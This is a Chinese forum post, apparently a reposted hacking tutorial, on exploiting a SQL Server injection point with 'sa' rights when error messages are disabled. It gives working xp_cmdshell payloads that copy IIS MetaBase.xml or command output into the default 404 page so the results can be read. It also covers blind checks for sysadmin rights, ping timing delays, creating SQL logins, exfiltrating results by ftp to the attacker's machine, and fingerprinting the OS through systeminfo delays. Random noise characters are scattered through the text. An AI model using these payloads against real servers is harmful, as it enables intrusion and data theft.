遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。% S" l% H/ v$ Q I1 d b+ Y: s
) |4 m/ @% }/ [4 |* X
虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
' e2 G4 [! z0 N4 t, Y5 Y) c r+ E& C# F9 x5 k& {* R t: G% a/ t; | K
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
: p3 c+ S) ^) j1 M" @5 M+ P
; l( m9 s( s' w" Q8 v6 ^, m IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm8 x3 ?. x% Y& X7 Z; V
# W! R1 h0 a9 s6 s
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--( }/ E( f* p6 @6 ^$ ~; q
& V- _/ k I; w0 E* _% u
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
! B2 \) o9 J: U2 v. T& v; x7 a( r5 z
执行命令得到回显+ A5 ?' E. }/ a/ L, ?
* \$ M- v; {2 q& }3 x 通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--# t: g* ^1 O x
" j9 \3 K" o' S1 }2 p; {# U6 [ 得到文件也shi相同,把文件copy到404b.htm就行了 M" _' K: z- t. r3 K+ |+ Y) T
( p+ U, R# X! d( \- D$ h by 28ice, 2008/6/265 x. c% i, \. D# R, v! W+ y6 l
* X2 b7 ?7 }3 B. Q) a8 q 摘自 28度的冰, g5 l. ^5 g8 X) J! t0 R
/ T; n$ W' l! o ^% Y 盲注判断权限和操作系统版本
& M+ P* I8 {0 E1 b0 ?8 {; N+ H6 V' q& S. F( |! @; j
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?6 h. r7 W0 S& T) Z+ h
+ s' f- F/ \2 W2 W) F% x 最简单的,可能以用这样的方法:
0 t) v4 @- ^: a: K1 K" D3 C7 d' c* c0 w) Z) z! H' T
1=(select IS_SRVROLEMEMBER(’sysadmin’))! k$ ]- Q3 \1 g( S
3 v/ ^$ m, a0 O9 H( h& M ?; n 当然,有些情况下,这个方法并不奏效。
) d) r9 E# d3 _ Q W+ V/ X# q) f1 z6 z [* |2 L
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。6 N* E; N& z- A
6 M+ j7 j' b# C7 {- q" Z 有个3办法可能以解决这个问题7 z# n- Y" K# @! Y$ i
; m1 T2 V, T5 ?3 M4 [+ ^+ h) J a.把执行结果写到404b.htm,具体请看我的上一篇文章
% E* J+ b) u% d2 |2 g6 Z7 Q" o9 g
$ U5 x$ K3 U, r8 w( \# P: L b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
/ k9 H8 n$ E. z9 g; K# s, x
6 X6 p, P: x% U0 p1 B$ K4 `3 t c.如果1433端口可能以连接,那干脆新建个sql登录
1 N3 |5 E. t2 `$ p- D4 z
- W; I: E; z6 _& Z: P d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
) {1 s/ }& G$ a6 x, K
1 h* z+ u5 c& N( r' P 还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下7 `' e0 D: a0 h4 a, G/ @
. ^; y6 @: @. I5 x
很简单6 z' o5 }5 x- N+ d
6 g: ~" C# p8 Z; ?
执行systeminfo: W5 D$ [+ u& g, n
$ v8 ~5 C$ I; H* F. P
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对